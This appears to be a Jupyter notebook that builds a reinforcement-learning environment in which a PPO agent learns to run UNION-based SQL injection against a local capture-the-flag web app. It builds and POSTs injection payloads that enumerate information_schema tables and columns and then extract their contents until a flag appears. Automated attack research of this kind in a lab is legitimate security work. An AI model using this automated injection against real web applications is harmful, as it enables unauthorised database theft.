In [ ]:
import gym
from gym import spaces
import numpy as np
import numpy as np
import gym
from xmlrpc.client import ResponseError
import numpy as np
import gym
from gym import Env
from gym import spaces 
from gym.spaces import Discrete, Box
import requests
import random
import re
import stable_baselines3
import time 

from time import sleep
from stable_baselines3.common.env_checker import check_env
from stable_baselines3 import A2C, DQN, PPO

In [ ]:
flags_found=[]

Prepep stuff

In [ ]:
# Generate the information_schema.TABLES default info

information_schema_default_tables = ("innodb_table_stats", "mysql", "information_schema", "performance_schema", "sys")
information_schema_columns = "information_schemaColumns.txt"

# Needs renaming to default tables from information schema
information_schema_default_columns = []

f = open(information_schema_columns)

for _ in f:
    _ = _.replace("\n","")
    information_schema_default_columns.append(_)

In [ ]:
class SQLiEnv(gym.Env):
    def __init__(self):
        self.url = "http://localhost:8000/index.php" # This is the URL for the web application.   
        self.header = {'User-Agent': 'Mozilla/5.0, RL-CTF'} # A default header for interacting with web forms
        self.interaction_form_name = "email" # This is the hard coded vulnerable HTML form input
        """
            The action space is made of the following discrete actions
            # Action 0: changeEscape1
            # Action 1: changeEscape2
            # Action 2: changeComment1
            # Action 3: changeComment2
            # Action 4: changecomment3
            # Action 5: findTables
            # Action 6: doNothing
            # Action 7: addColumn
            # Action 8: changeTables
            # Action 9: findColumns
            # Action 10: tryColumns
        """
        self.action_space = spaces.Discrete(11)  # See above for abstract 
        
        """
            The observation space is an array with the following assumptions:
            Has SQL Injection been found: Boolean
            Has an Error occured: Boolean 
            Has the correct escape character been found: ', or ", or Not Found
            Has the comment been found: # c, -- c, /* c, or Not Found
            How many columns used: maximum of 20
            Have the tables been found: Yes, No
            Have the columns been found: Yes, No
            Has the flag been found: Yes or No
            Has the challenge been completed: Yes or No
            Did we go out of bounds - too many columns: Yes or No
            What were the last 5 actions? - 5
            
            We can add more as we see fit
                   
        """
        done = False
        self.observation_space = spaces.Box(low=0, high=1, shape=(45,), dtype=np.float32)
        self.reset()
        
        self.numberOfActionsTotal = 0
        
        self.log = ''
        

    def reset(self):
        self.sqlStatement = ""
        self.payload = ""
        self.unionStatement = "UNION ALL SELECT"
        self.nullStatement = ""
        self.columnStatement = ""
        self.escapeStatement = ""
        self.commentStatement = ""
        self.tableStatement = ""
        self.tables = [""]
        
        self.columns = [""]
        self.HTMLRESPONSE = [""]
        self.outofBounds = False
        self.outofActions = False
        self.sqlInjectionFound = False
        
        self.tableUsed = 0
        self.tableChosen = self.tables[self.tableUsed]
        #self.columnChecker = self._find_columns()
        
        self.columnsFound = False
        self.tablesFound = False
        self.flagFound = False
        
        self.columnDict = {}
        
        
        
        self.columnsUsed = 0
        self.tablesFound = 0
        self.totalActions = 1000
        self.maxColumns = 2
        
        
        self.index = 0
        self.actionHistory = [0] * 10
        self.observationIndex = 31 # For the previous action history
        
        
        self.log = ''
        
        print("Resetting \n")
        
        return self._get_obs()

    def step(self, action):
        
        self.numberOfActionsTotal +=1
        
        print("Current Action is: ", action)
        
        self.tableChosen = self.tables[self.tableUsed]
        
        #print("The currently chosen table is: ", self.tableChosen)
        
        #if len(self.tables) >1:
        #    print("We have found some tables I will update the default table for column queries")
        #    self.tableUsed = 1
            
        #    print(self.tableUsed)
        
        if action == 0:
            #print("Change Escape 1")
            self.escapeStatement = self._changeEscape1()
            
            #print("Escape", self.escapeStatement)
            
        if action == 1:
            #print("Change Escape 2")
            self.escapeStatement = self._changeEscape1()
            
            #print("Escape", self.escapeStatement)
            
        if action == 2:
            self.commentStatement = " -- c"
            #print("Comment", self.commentStatement)
            
        if action == 3:
            self.commentStatement = " # c"
            #print("Comment", self.commentStatement)
            
        if action == 4:
            self.commentStatement = " /* c"
            #print("Comment", self.commentStatement)
            
        if action == 5:
            
            self.columnStatement = ""
            
            if self.columnsUsed == 0:
                self.tableStatement = ' CONCAT("##", table_name, "##") from information_schema.tables '
            else:
                self.tableStatement = ' ,CONCAT("##", table_name, "##") from information_schema.tables '
                
            #print("Table Statement", self.tableStatement)
            checker = self._find_tables()
            
            
        # Action 6 is an arbitrary doNothing action
        
        if action == 7:
            #print("Adding Column")
            x = self._add_column()
            self.nullStatement = x[0]
        
        # Change to a different table via the sql statement
        if action == 8:
            
            if len(self.tables) == 1:
                print("Can't change tables there is no found table")
                    
            #print("The tables that we can change from are: ", self.tables)
                    
            elif not (self.tableUsed + 1) >= len(self.tables):
                #print("Changing Tables")
                self.tableChosen = self.tables[self.tableUsed]
                #print("The previous table is ", self.tableChosen)
                self.tableUsed +=1
                self.tableChosen = self.tables[self.tableUsed]
                #print("The new table is ", self.tableChosen)
                self.tableStatement = ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
                
            #else:
            #    self.tableUsed = 0
            #    print("Changing Tables")
            #    tableChosen = self.tables[self.tableUsed]
            #    self.tableStatement = ' from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
            #    self.tableUsed +=1
        
        # Try finding the column values from the currently selected table
        if action == 9:
            #print("Finding Column Values Action")
            
            self.columnStatement = ""
             
            if len(self.tables) == 1: # The default table value when resetting contains a null value.
                print("Tables Not found yet, invalid action")
                reward = -10
            else:
                #print("We have some tables to choose from")
                #print("The current to use is: ", self.tableChosen, "Because of index value: ", self.tableUsed)
                
                #if self.tableUsed == 0:
                #    self.tableUsed +=1 # Debugging workaround
                #    self.tableChosen = self.tables[self.tableUsed] # Debugging workaround
                #    print("Modifying table chosen value from 0 to 1: ", self.tableChosen)
                #    print("Trying the column values of this table: ", self.tableChosen)
                
                if self.columnsUsed == 0:
                    self.tableStatement = ' CONCAT("&&", column_name, "&&", table_name) from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
                else:
                    self.tableStatement = ',CONCAT("&&", column_name, "&&", table_name) from information_schema.columns WHERE table_name = "{}" '.format(self.tableChosen)
            
                checker = self._find_columns()
        
        # Trying the column values
        if action == 10:
            
            if len(self.columns) >1:
                
                foundColumns = str(self.columns)
                #self.columnStatement = "CONCAT ({}) ".format(foundColumns.replace("'","").replace("[","").replace("]",""))
                
                #print("Statement before trying to add column values", self.payload)
                if self.columnsUsed == 0:
                    self.columnStatement = "CONCAT({})".format(str(self.columnDict[self.tables[self.tableUsed]]).replace("[","").replace("]","").replace("'",""))
                else:
                    self.columnStatement = ",CONCAT({})".format(str(self.columnDict[self.tables[self.tableUsed]]).replace("[","").replace("]","").replace("'",""))
                
                self.tableStatement = " FROM {}".format(self.tables[self.tableUsed])
                
                #print("statement after trying to add column values", self.payload)

           #     print("COLUMNS I am trying based on what I found: ", self.columnStatement, self.tableStatement)
                
            else:
                reward = -10
            #    print("Cant do this action no columns have been found")
                
                
        # Reformatting stuff lazy bug workaround
        #if self.columnsUsed >=1:
        #    self.columnStatement.replace(",","",1)
          
        
        self.payload = "{} {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.nullStatement, self.columnStatement, self.tableStatement, self.commentStatement)        
            
            
        #print("Statement: {} {} {} {} {}".format(self.escapeStatement, self.unionStatement, self.columnStatement, self.tableStatement, self.commentStatement))
        
        
        ### Posting the exploit
        self.exploit = {"email":"{}".format(self.payload)}
        self.HTMLRESPONSE = self._POST(self.exploit)
        
        
        checker = self._find_tables()
        columnChecker = self._find_columns()
        
        normalisedAction = self._normalize(action)
        addActionHistory = self._addActionHistory(normalisedAction)
        
        #print(self.actionHistory)
        
        self.totalActions -=1
        done = False 
        reward = -5
        
        if "Error" in self.HTMLRESPONSE[0]:
            self.sqlInjectionFound = True
        
        if "RL{ZxKE}" in self.HTMLRESPONSE[0]:
            print("###### !FLAG! #####")
            print("\n")
            print("I HAVE FOUND THE FLAG :)")
            reward = 100
            
            self.sqlInjectionFound = True
            self.flagFound = True
            
            flagFoundInfo = "{}".format(self.numberOfActionsTotal, self.totalActions)
            
            flags_found.append(flagFoundInfo)
            done = True
            
        if self.columnsFound == True:
            
            reward = -5
            print("Found the columns 2")
            
            
        if self.tablesFound == True:
            print("Found the tables 2")
        
        if self.columnsUsed == self.maxColumns: # Terminate episode if we go out of bounds of our maximum column value
            print("Ending Early")
            
            self.outofBounds = True
           
            reward = -100
            #end_observation = self._get_obs()
            done = True
            
        if self.totalActions == 0:
            print("Out of Actions")
            
            self.outofActions = True
            reward = -100
            #end_observation = self._get_obs()
            done = True
            
            
        print("Current columns: ", len(self.columns), self.columns)
        print("Columns used: ", self.columnsUsed, "Action Used: ", action, "Payload: ", self.payload, "\n", "Current Reward: ", reward)
        print("Out of bounds: ", self.outofBounds, "Out of actions: ", self.outofActions)
        print("Current Obs: ", self._get_obs())
        #print(self._get_obs())
        return self._get_obs(), reward, done, {}
    
    
        
    
    def _changeEscape1(self):
        self.escapeStatement = "' "
        return self.escapeStatement
    
    def _changeEscape2(self):
        self.escapeStatement = '" '
        return self.escapeStatement
    
    def _changeComment1(self):
        pass
    
    def _add_column(self):
        if self.columnsUsed == 0:
            self.nullStatement = "NULL "
            self.columnsUsed +=1
            
        else:
            self.columnsUsed +=1
            self.nullStatement = ",NULL " * self.columnsUsed
            self.nullStatement = self.nullStatement[1:]
            
        if "CONCAT" in self.tableStatement:
            if ",CONCAT" not in self.tableStatement:
                self.tableStatement = self.tableStatement.replace("CONCAT",",CONCAT")
                
        if "CONCAT" in self.columnStatement:
            if ",CONCAT" not in self.columnStatement:
                self.columnStatement = self.columnStatement.replace("CONCAT,","CONCAT")
                
        return self.nullStatement, self.columnsUsed
    
    def _find_columns(self):
        
        self.columnsFoundCheck = self.HTMLRESPONSE[0].count("&&")
        
        if self.columnsFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]:
            self.columnsFound = True
            print("Columns Found")
            
            columnString = re.findall("&&(.*?)&&", self.HTMLRESPONSE[0])
            
            columnDictKey = self.tables[self.tableUsed]
            columnDictValues = []
            
            for columnName in columnString:
                if columnName == "":
                    pass
                
                elif "column_name" in columnName:
                    pass
                
                elif "table_name" in columnName:
                    pass
                
                else:
                    
                    
                    if columnName not in self.tables:
                        
                        columnDictValues.append(columnName)
                    
                        if columnName not in self.columns:
                            self.columns.append(columnName)

                        if columnDictKey in self.columnDict:
                            self.columnDict[columnDictKey] = columnDictValues
                            
        return self._get_obs()
    
            
    
    def _find_tables(self):
        
        print("Begin finding tables function")
        self.tablesFoundCheck = self.HTMLRESPONSE[0].count("##")
        
        if self.tablesFoundCheck >2 and "Error Message: The used SELECT" not in self.HTMLRESPONSE[0] and "You have an error in your SQL syntax" not in self.HTMLRESPONSE[0]: 
            print("Tables Found")
            self.tablesFound = True
            
            tableString = re.findall("##(.*?)##", self.HTMLRESPONSE[0])
            
            for tableName in tableString:
                if tableName == "":
                    pass
                
                elif "table_name" in tableName:
                    pass 
                
                elif "column_name" in tableName:
                    pass
                
                else:
                
                    if tableName not in information_schema_default_columns:
                        if tableName not in self.tables:
                            if "" in self.tables:
                                self.tables.remove("")
                            if None in self.tables:
                                self.tables.remove(None)
                            self.tables.append(tableName)
                            
                            if tableName not in self.columnDict:
                                self.columnDict[tableName] = []
                            
            #print("The current tables: ", self.tables)
        
            #print("TABLE STRING", tableString)
            #print("LIST OF FOUND TABLES", self.tables)
            
            
        return self.tablesFound, self._get_obs()
    
    def _GET(self):
        try:
            # GET request using the url and custom header
            response = requests.get(self.url, headers=self.header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e

    # This function is for the HTTP POST requests for submitting our SQL injection payloads
    def _POST(self, exploit):
        try:
            # Send the url, header and data containing the payload. This is found in the custom environment
            # Search for "exploit" in the custom environment to find this part 
            response = requests.post(self.url, headers=self.header, data=exploit)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e 

    # We can use this to change the challenge on the home page when the environment resets.
    # I currently havent coded it into the environment since its a proof of concept for error based UNION SELECT 
    def _ChangeChallenge(challenge):
        print(challenge)
        try:
            response = requests.get(challenge, headers=header)
            return response.text, response.status_code, len(response.text)
        except ResponseError as e:
            return e


    def _normalize(self, chosenAction):
        max_val = 20
        normalized_values = chosenAction / max_val
        #print("ORIGINAL", chosenAction, "NORMALISED", normalized_values)
        return normalized_values

    # Function to add items to the list and maintain its size at 10
    def _addActionHistory(self, chosenAction):
        self.actionHistory[self.index] = chosenAction
        #self.index = (self.index + 1) % 10  # Update index in a circular manner
        new_item = _
        self.index +=1
        
        if self.index == 10:
            self.index = 0
    
    def _get_obs(self):
        obs = np.zeros(45)
        
        
        if self.sqlInjectionFound == True: # If SQL injection is found based on a returned website response
            obs[0] = 1
            
        if self.escapeStatement == "":
            obs[1] = 1
        
        if self.escapeStatement == "' ":
            obs[2] = 1
            
        if self.escapeStatement == '" ':
            obs[3] = 1
            
        if self.commentStatement == "":
            obs[4] = 1
            
        if self.commentStatement == " -- c":
            obs[5] = 1
            
        if self.commentStatement == " # c":
            obs[6] = 1
            
        if self.commentStatement == " /* c":
            obs[7] = 1
        
        if self.tablesFound == True: 
            obs[29] = 1
            
        if self.columnsFound == True:
            obs[30] = 1
             
        if self.outofBounds == True:
            obs[42] = 1
            
        if self.outofActions == True:
            obs[43] = 1
        
        if self.flagFound == True:
            obs[44] = 1
            
        obs[8 + self.columnsUsed] = 1 # Which column used value in the array. For example if none then index 8 = 1
        
        for _ in self.actionHistory:
            #print("Observation Index", self.observationIndex)
            obs[self.observationIndex] = _
            self.observationIndex +=1
        
        # Reset actionhistory index to 30 after populating 
        self.observationIndex = 31
            
        return obs

    
    def render(self, mode=None):
        print(self.log)
        self.log = ''

In [ ]:
from stable_baselines3.common.env_checker import check_env

env = SQLiEnv()

check_env(env, warn=True)

env.reset()


In [ ]:
model = PPO("MlpPolicy", env, verbose=1)
model.learn(total_timesteps=1000000)


In [ ]:
print(flags_found)